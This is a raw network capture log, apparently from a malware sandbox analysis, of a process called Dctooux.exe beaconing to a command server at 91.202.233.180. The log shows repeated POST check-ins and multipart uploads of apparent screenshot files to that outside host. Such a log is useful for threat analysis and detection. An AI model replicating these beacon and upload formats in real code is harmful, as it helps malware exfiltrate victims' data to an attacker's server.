Apr 14, 2024 08:45:45.710592031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:45.711321115 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:46.049926043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:46.483033895 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:46.811048031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:46.826919079 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:47.159800053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:46.714448929 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTI0NDU= Host: 91.202.233.180 Content-Length: 92597 Cache-Control: no-cache
Apr 14, 2024 08:45:46.714493036 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 49 30 4e 44 55 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTI0NDU=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:46.714553118 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:46.714593887 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:46.714612007 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:46.714646101 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:46.714674950 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:46.714710951 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:46.714745045 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:46.714772940 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:46.714801073 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:48.048754930 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:47.597769976 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:47.931638956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:47.932468891 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:48.270649910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Apr 14, 2024 08:45:48.355187893 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTI= Host: 91.202.233.180 Content-Length: 86544 Cache-Control: no-cache
Apr 14, 2024 08:45:48.355187893 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:48.355187893 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:48.355187893 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:48.355261087 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:48.355261087 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:48.355261087 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:48.355277061 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:48.355302095 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:48.355325937 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:48.355357885 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:50.729518890 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:48.704658031 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:49.038671970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:49.077132940 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:49.411456108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:49.846491098 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:50.177634001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:50.178498030 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:50.515137911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49751	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:50.955715895 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:51.289112091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:51.290219069 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:51.626796961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49752	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:51.301564932 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTI= Host: 91.202.233.180 Content-Length: 86544 Cache-Control: no-cache
Apr 14, 2024 08:45:51.301634073 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:51.301698923 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:51.301748037 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:51.301832914 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:51.301870108 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:51.301906109 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:51.301953077 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:51.301987886 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:51.302028894 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:51.302064896 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:52.362565041 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49753	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:52.085187912 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:52.419516087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:52.420957088 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:52.761404037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49754	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:52.931085110 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTI= Host: 91.202.233.180 Content-Length: 86544 Cache-Control: no-cache
Apr 14, 2024 08:45:52.931193113 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:52.931269884 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:52.931308031 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:52.931340933 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:52.931372881 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:52.931406021 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:52.931438923 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:52.931473970 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:52.931504965 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:52.931538105 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:54.925504923 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49755	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:53.252701044 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:53.586775064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:53.608971119 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:53.948189974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49756	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:55.327413082 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:55.660793066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:55.661482096 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:56.002949953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

